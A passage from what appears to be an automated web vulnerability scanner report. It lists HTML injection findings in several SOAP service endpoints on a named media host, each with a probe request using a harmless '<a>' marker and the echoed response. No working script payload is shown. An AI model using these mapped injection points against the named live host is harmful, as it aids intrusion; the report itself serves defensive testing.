Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8bdb6<a>f2e8c6d2662 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&8bdb6<a>f2e8c6d2662=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:04 GMT
Content-Length: 22408
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&8bdb6<a>f2e8c6d2662=1/ClipInfoService.asmx" />
...[SNIP]...

1.82. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 8c544<a>375738d4296 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337968c544<a>375738d4296 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:01 GMT
Content-Length: 22396
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337968c544<a>375738d4296/ClipInfoService.asmx" />
...[SNIP]...

1.83. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 38157<a>7e8dbb9295c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&38157<a>7e8dbb9295c=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:10 GMT
Content-Length: 5637
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&38157<a>7e8dbb9295c=1/ErrorInfoService.asmx" />
...[SNIP]...

1.84. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 4d574<a>afe51a628d3 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337964d574<a>afe51a628d3 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:08 GMT
Content-Length: 5625
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337964d574<a>afe51a628d3/ErrorInfoService.asmx" />
...[SNIP]...

1.85. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 15b26<a>94660917f43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&15b26<a>94660917f43=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:45:45 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&15b26<a>94660917f43=1/PlaylistInfoService.asmx" />
...[SNIP]...

1.86. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 97afc<a>1b27d99bc68 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379697afc<a>1b27d99bc68 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:45:43 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379697afc<a>1b27d99bc68/PlaylistInfoService.asmx" />
...[SNIP]...

1.87. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 47c22<a>ef7e3604f7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&47c22<a>ef7e3604f7f=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:10 GMT
Content-Length: 8814
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&47c22<a>ef7e3604f7f=1/RSSService.asmx" />
...[SNIP]...

1.88. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 3dd0c<a>b8631e28575 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337963dd0c<a>b8631e28575 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:07 GMT
Content-Length: 8802
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337963dd0c<a>b8631e28575/RSSService.asmx" />
...[SNIP]...

1.89. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b6ec5<a>cd69370a51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&b6ec5<a>cd69370a51b=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:07 GMT
Content-Length: 5534
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&b6ec5<a>cd69370a51b=1/RatingService.asmx" />
...[SNIP]...

1.90. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 4f192<a>a7b9e42493c was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337964f192<a>a7b9e42493c HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:05 GMT
Content-Length: 5522
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337964f192<a>a7b9e42493c/RatingService.asmx" />
...[SNIP]...

1.91. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32406<a>52ff5e45529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&32406<a>52ff5e45529=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:15 GMT
Content-Length: 1913
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&32406<a>52ff5e45529=1/AdServerService.asmx" />
...[SNIP]...

1.92. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 5468e<a>fbf31252ddf was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337995468e<a>fbf31252ddf HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:13 GMT
Content-Length: 1907
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337995468e<a>fbf31252ddf/AdServerService.asmx" />
...[SNIP]...

1.93. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e81a6<a>eb6d1a11e41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&e81a6<a>eb6d1a11e41=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:54:36 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&e81a6<a>eb6d1a11e41=1/ChannelInfoService.asmx" />
...[SNIP]...

1.94. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 847a5<a>b32f67f54e9 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799847a5<a>b32f67f54e9 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:54:35 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799847a5<a>b32f67f54e9/ChannelInfoService.asmx" />
...[SNIP]...

1.95. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d1973<a>f81fb9edf10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&d1973<a>f81fb9edf10=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:18 GMT
Content-Length: 22408
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&d1973<a>f81fb9edf10=1/ClipInfoService.asmx" />
...[SNIP]...

1.96. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload d659f<a>818d4ea9fd6 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799d659f<a>818d4ea9fd6 HTTP/1.1
